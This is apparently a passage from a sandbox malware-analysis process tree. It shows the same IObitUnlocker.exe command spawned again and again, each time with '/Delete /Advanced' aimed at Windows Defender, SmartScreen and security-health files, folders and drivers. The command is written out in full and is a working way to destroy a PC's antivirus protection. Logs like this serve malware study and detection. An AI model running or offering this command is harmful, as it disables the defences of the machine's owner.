                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7596
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8008
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1364
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4968
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
